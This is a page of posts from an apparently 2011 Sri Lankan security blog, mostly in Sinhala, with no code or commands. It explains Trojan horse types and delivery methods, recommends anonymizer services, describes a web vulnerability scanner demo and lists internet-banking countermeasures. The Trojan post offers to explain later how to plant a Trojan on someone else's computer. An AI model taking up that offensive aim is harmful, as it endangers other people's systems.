පරිඝනකයට පනින ට්‍රෝජන් අශ්වයෝ!!

ට්‍රෝජන් අශ්වයෙක් (Trojan Horse) කියන්නෙ ඔබේ අනුමැතිය නොමැතිව හෝ ඔබ නොදැන ඔබේ පරිඝනකය තුල ක්‍රියාත්මක වන මෘදුකාංගයක්. මෙහි විශේෂත්වය තමයි මෙය ඔබේ පරිඝනකයට හදුන්වා දෙන්නෙ එහි ඇත්ත තත්වය සඟවල. උදාහරණයක් විදිහට ඔබට වෙබ් අඩවියකින් නොමිලයේ ලස්සන ස්ක්‍රීන් සර්වරයක් (Screen Server) ලබා දෙනවා. ඔබ එය බාගත කරගෙන ස්තාපනය කරගන්නවා. පිටතින් එය ලස්සන ස්ක්‍රීන් සර්වරයක් උනාට එය ඇතුලත පවතින්නෙ විනාශකාරී මෘදුකාංගයක්.


ට්‍රෝජන් අශ්වයා කියන විශේෂිත නාමය මෙයට ලැබිල තියෙන්නෙත් ඒ නිසාමයි. ග්‍රීක මහා කවි හෝමර් විසින් ලියනු ලැබූ තුසරපුර සංග්‍රාමයේ එන සිදුවීමක් තමයි විශාල දැව අශ්වයෙක් ඇතුලෙ සෙබලු සඟවල සතුරු නගරයට යවපු එක. සතුරු නගර වැසියෝ කලේ එය තෑග්ගක් විදිහට සලකල වසර දහයකට ආසන්න කාලයක් පැවති සංග්‍රාමයෙන් ඔවුන්ව ආරක්ශා කරපු විශාල පවුර බිඳ දමල අර ඇතුලෙ හංගල හිටිය සෙබලුත් එක්කම ලී අශ්වය නගරය ඇතුලට ගත්ත එක. ඊට පස්සෙ උන දේ අමුතුවෙන් කියන්න ඕනි නෑනෙ. ඕකට අපේ සමාජයේ කතාවක් තියෙනවා "අහක යන නයි රෙද්ද අස්සෙ දාගෙන කෑවෝ කෑවෝ කියල කෑගහනවා" කියල. මම මෙහෙම කෙටියෙන් කිව්වට මේ ග්‍රීක කතන්දරය ඉතාමත් දිග ලස්සන කතාවක් එහිම පසු කතාව වන ඔඩිසියස් කියන කතාවත් හරිම ලස්සනයි. දෙකම සිංහලට පරිවර්තනය වෙලා තියෙනවා.

ට්‍රෝජන් අශ්වයෙක් පරිඝනකයට විවිද අරමුණු මුල් කරගෙන හදුන්වා දෙනු ලබන්න පුළුවන්. ප්‍රධාන වශයෙන් ට්‍රෝජන් අශ්වයන් හදුන්වා දෙනු ලබන්නෙ තොරතුරු සොරා ගැනීමට හෝ පරිඝනකය විනාශ කිරීම සඳහායි.

ට්‍රෝජන් අශ්වයෙක් පිටුපස සෑම විටම පහර දෙන්නෙක් සිටිනවා. ට්‍රෝජන් අශ්වයා සහිත පරිඝනකය අන්තර්ජාල සම්බන්දතාවය ලබා ගත්ත ගමන්ම පහර දෙන්නාට ඔහුගේ පහර දීම කරන්න අවශ්‍ය ඉඩකඩ සෑදෙනවා.

ට්‍රෝජන් අශ්ව ප්‍රභේද :-
  • මුරපද ග්‍රහණය/යැවීම (Password Sending/Capturing)
  • FTP Trojans
  • Key Stroke Captures (මෙමගින් යතුරු පුවරුවේ ලියනය කරන හැම අකුරක්/සංකේතයක්ම ග්‍රහණය කර ගන්නවා)
  • විනාශකාරී ට්‍රෝජන් අශ්වයන්
  • Denial of Service (DoS)
  • Proxy/MITM (Man In The Middle Attack) Trojans
  • දුරස්ත ඇතුල්වීම් ට්‍රෝජන් අශ්වයන් (Remote Access)
  • Software Detection Killers
මෙතන සමහර දේවල් මේක කියවන සමහර අය නොදන්නවා වෙන්න පුලුවන් නමුත් මේවා දීර්ඝව විස්තර කරන්න ඕනි. ඒ වගේම මේ හා සම්බන්ද දේවල් වෙන Wrappers, Sniffers, Spoofing, Man in the Middle Attack යන ඒවාත් වෙනම විස්තර කරන්න ඕනි. මේවා මම පසුව ඉඩ ඇති හැටියට ලියන්න හිතාගෙන හිටියත් ඔබට වැදගත් කියල හිතනවනම් මට කියන්න මම ඒවාත් විස්තර කරල වෙනම ලිපි ලියන්නම්.

ට්‍රෝජන් අශ්වයන් හදුන්වාදෙනු ලබන ආකාර :-
  • චැට් හරහා (Chat Clients) - Skype, AIM, Yahoo, Facebook Chat, Google Chat, ICQ, IRC, MSN, Trillian
  • e-Mail පණිවුඩ වලට අමුණලා (Email Attachments)
  • භෞතිකව පරිඝනක පද්ධතියට ඇතුල්වීමෙන්
  • අන්තර්ජාල සෙවුම් මෘදුකාංග (Browser) සහ e-Mail මෘදුකාංග වල දුර්වලතා (Bugs) උපයෝගයෙන් (x-site scripting)
  • ගොනු හුවමාරුව (File Sharing) - සව්‍යංක්‍රීයව (Autorun) ක්‍රියාත්මක වෙන ට්‍රෝජන් අශ්වයන් Flash Drives හා CD/DVD තුලට ඇතුලත් කිරීම
  • Wrappers (වෙනත් වැඩ සටහන් වල සඟවා හෙවත් ඔතා එවීම)
  • P2P සහ වෙනත් Freeware අඩවි හරහා
  • News Groups - News Group අඩවියක ඇමුණුමක් සමඟ (ට්‍රෝජන් අශ්වයෙක් අමුණා) ප්‍රවෘත්ති ලිපි පල කිරීමෙන්
  • අනාරක්ශිත වෙබ් අඩවි හරහා බාගත කිරීමෙන්
මේ හදුන්වා දෙන ආකාර පිළිබද දැනුවත් වීමෙන් ට්‍රෝජන් අශ්වයන් ඔබේ පරිඝනකයට පැනීමෙන් වලක්ව ගන්න පුලුවන්.

පොදු වශයෙන් ට්‍රෝජන් අශ්වයන් භාවිතා වෙන ආකාර:-
  • පරිඝනකයක CD-Rom එක විවෘත කිරීම
  • පරිඝනකයේ Screenshot ගැනීම
  • Key Strokes ග්‍රහනය සහ ඒවා පහර දෙන්නාට යැවීම
  • පරිඝනකයේ සියලුම ගොනු හා Drives වලට සම්පූර්ණ ඇතුලත් () වීමේ පහසුකම ලබා දීම.
  • ඔබේ පරිඝනකය වෙනත් හැකිං කියාවලියක් සඳහා පාලමක් ලෙස භාවිතා කිරීම.
  • යතුරු පුවරුව හා මූසිකය ක්‍රියා වියහිත කිරීම.
ට්‍රෝජන් අශ්ව වැඩසටහන් වර්ග අපිට අන්තර්ජාලය තුලින් ලබාගෙන පාවිච්චි කරන්න පුලුවන්. එහෙම ට්‍රෝජන් අශ්වයෙක් යවන ආකාරය ගැන මම වෙනත් ලිපියකින් ලියන්නම්.

ප. ලි. මම දිනපතා ලිපි ලියන්නෙ නැති නිසා ට්‍රෝජන් අශ්වයෙක් වෙන කෙනෙක්ගෙ පරිඝනකයට පන්නන්න ඉක්මනටම දැන ගන්න ඕනිනම් ඒක මට කියන්න මම ඉක්මනටම ඒ ගැන ලියන්නම්.

Friday, September 30, 2011

Anonymizers - ඇත්තටම ඇනෝවෙක් වෙන්න


ඇනෝල කිව්වම බ්ලොග් අවකාශයේ ඉන්න හැමෝම දන්නවනෙ. මම හදන්නෙ ඒ අය ගැන කතා කරන්න නෙමෙයි. මම හදන්නෙ ඔබේ IP ලිපිනය සඟවල web surfing කරන්න පුළුවන් ආකාරයක් ගැන. ඒ තමයි Anonymizers.

ඇනොනිමයිසරයක් ඉස්සෙල්ලම හදල තියෙන්නෙ Anonymizer, Inc කියන ආයතනය. ඇනොනිමයිසරයක් කියන්නෙ Proxy Sever එකක්. ඇනොනිමයිසරය අන්තර්ජාලයේ සැරිසරන්නාගේ පරිඝනකය සහ අන්තර්ජාලය අතර අතරමැදියෙක් විදිහට ක්‍රියා කරනවා. කොටින්ම ඔබ වෙනුවෙන් ඇනොනිමයිසරය අන්තර්ජාලයට සම්බන්ද වෙලා එය හරහා ඔබට අවශ්‍ය තොරතුරු ලබා දෙනවා සහ එමඟින් ඔබගේ පරිඝණකයේ තොරතුරු (IP address) ඔබගේ පුද්ගලික තොරතුරු සඟවනවා (ඒ කියන්නෙ ඔබගේ ලිපිනය ඔබ ඇතුල් වෙන වෙබ් පිටු හෝස්ට් වෙලා තියෙන වෙබ් සර්වර්යේ ලොග්ස් වල සටහන් වීම එමඟින් වළක්වනවා).


ඇනොනිමයිසරයක් භාවිතා කිරීමෙන් ඔබගේ හැදුනුම් සොරාගැනීමකට ලක් වීමේ ඉඩ ඇසිරෙනවා. එනිසා එය ඔබගේ වෙබ් අවකාශයේ ආරක්ශාවට වැදගත්. ඔබ හිතනවා ඇති ඇයි මම IP address සහ ඔබව අනාවරණය වන තොරතුරු සඟවන්නෙ කියල. කොටින්ම අපි මහපාරෙ යනකොට මම මෙයයි කියල ID card එක වන වනා කෑ ගහගෙන යන්නෙ නැහැනෙ. මෙතනත් එයටම සමාන අවස්තාවක්. ඔබ අන්තර්ජාලයේ යම් වෙබ් පිටුවකට ඇතුල් වෙනකොට ඔබේ තොරතුරු ඔවුන් දැන ගැනීම අවශ්‍ය නොවෙනවා කියල තමයි මම හිතන්නෙ. ඒ නිසා ඇනොනිමයිසරය ඉතාමත් වැදගත් අන්තර්ජාලය තුල ඔබව ආරක්ශා කර ගැනීමට.

නමුත් ඇනොනිමයිසරයන් ප්‍රායෝගික තලයේදි භාවිතා වෙන්නෙ තමන් ආරක්ශා වෙනවාට වඩා අනුන්ගෙ ආරක්ශාවට තර්ජනයක් ඇති කරන්න. විශේෂයෙන්ම විවිධ මානසික ප්‍රශ්ණ තියෙන පුද්ගලයො තමන්ගෙ තොරතුරු සඟවන්න මේවා භාවිතා කරනවා (ඔය බ්ලොග් වල කුණුහරුප එහෙම ලියන්නෙ). ළමා අපයෝජන අසභය චිත්‍රපට වැඩි වශයෙන් හුවමාරු කිරීමට සහ නැරඹීමට ඇනොනිමයිසරයන් භාවිතා වීම ඇනොනිමයිසරයන් නිසා ඇතිවී තිබෙන ගැටළුකාරී තත්වයක් බව විකිපීඩියාව පවසනවා.

මෙමඟින් අවසානයට හිතන්න පුළුවන් ඇනොනිමයිසරය කියන්නෙ එක හා සමානව හොඳට හා නරකට භාවිතා කරන්න පුළුවන් දෙයක්. නමුත් අනවශ්‍ය වෙබ් පිටුවල තමන්ගේ අන‍න්‍යතාවය සටහන් වෙනවට අකමැති අයට පාවිච්චි කරන්න හොඳ ඇනොනිමයිසරයන් කිහිපයක් මම පහලින් සදහන් කරන්නම්.

  • Anonymouse - මෙය ඉතා හොඳ ඇනොනිමයිසරයක් සහ මෙය නොමිලයේ බාගත කරන්න පුලුවන් . මේකෙ පාවිච්චි වෙන්නෙ CGI proxy එකක්, එයින් ඔබට anonymously වෙබ් පිටුවල සැරිසරන්න, anonymous e-mails යවන්න හැකියාව ලබා දෙනවා.

  • ProxyKing.net - මේ ඇනොනිමයිසර සේවාව වෙබ් අඩවි වලට ඔබව හසු (track) කිරීමට වැලකීම සහ ඔබගේ පරිගනකයේ cookies ස්තාපනය කිරීමේ හැකියාව වලකනවා.

  • AnonymousIndex.com - මෙය IP ලිපිනය සැඟවීම, වෙබ් පිටුවල දිස් වන දැන්වීම්, referrers සහ cookies කලමනාකරණය කරන අන්තර්ජාලයේ නොමිලයේ පවතින ප්‍රොක්සි සර්වර් එකක්.

  • HideMyAss.com - නොමිලයේ ලබා දෙන ඇනොනිමයිසර සේවාවක්.

  • ProxyFoxy.com - නොමිලයේ ලබා දෙන ඇනොනිමයිසර සේවාවක් සහ මෙමඟින් cookies, spyware සහ වෙනත් අනතුරුදායක scripts මඟහැරීම සිදුකරනවා.

Wednesday, September 14, 2011

Acunetix Web Vulnerability Scanner - Demostration

I made this video for one of my assignments at University. This video shows how to use Acnetix WVS software at basic level.



You can use Acunetix WVS to scan your website to find what are the vulnerabilities the web site have.

You can download this software form Acunetix website.

Security of Internet Banking (Part 3) - Countermeasures to Reduce Risks in Internet Banking




These are some countermeasures I have identified to reduce the risk in Internet banking for each attacks.

· User Surveillance

o Having a security policy regarding token and password handling.

· Theft of token and handwritten notes

o Having a security policy regarding token and password handling.

o Giving passwords that are easy to remember still hard to guess such as combing dictionary word with symbols and numbers.

· Hidden code

o Operating System/browser patching

o Code installation blockers

o Anispyware software

o Antiphishing software (URL inspection)

o Firewall for blocking inbound and outbound connections to unauthorized ports

o Intrusion/anomaly detection

o Best practices for browser security (cookies, window pop-ups, java support, etc)

· Worms and bots

o Operating System/browser patching

o Code installation blockers

o Anispyware software

o Custom application secure coding

o Firewall for blocking inbound and outbound connections to unauthorized ports

o Intrusion/anomaly detection

o Best practices for browser security (cookies, window pop-ups, java support, etc)

· E-mails with malicious code

o E-mail policy

o Code installation blockers

o Attachment blocking

o HTML code blocking

o Antispam software

o Anispyware software

o Antiphishing software (URL inspection)

o Firewall for blocking inbound and outbound connections to unauthorized ports

o Intrusion/anomaly detection

· Smartcard analyzers

o Noise generators

o Power and time neutral code designing

· Smartcard reader manipulator

o Secure smartcard interface design and implementation


· Brute force attacks with PIN calculations

o Increasing number of digits (at least eight digits)

· Social engineering

o Increasing security awareness

o Simple URLs that are easy to remember

o Antiphishing software (URL inspection)

· Web page obfuscation

o Monitoring the domain name server (DNS)

o Prohibiting the IP addresses instead of URLs.

o Using predetermined list of valid URLs.

· Pharming

o Monitoring the server

o Patch management

o Intrusion/anomaly detection

o Firewall

· Active man in the middle attacks

o Using predetermined SSL certificates

o Mutual authentication and encryption through client-server SSL

· Session hijacking

o State management to prevent session ID specification in the message, session ID rotation and life cycle management

· Brute force attacks

o Monitoring the server

o Patch management

o Intrusion/anomaly detection

o Firewall

· Bank security policy violation

o Security policy implementation according to standards such as ISO 17799

· Website manipulation

o Monitoring the server

o Patch management

o Intrusion/anomaly detection

o Firewall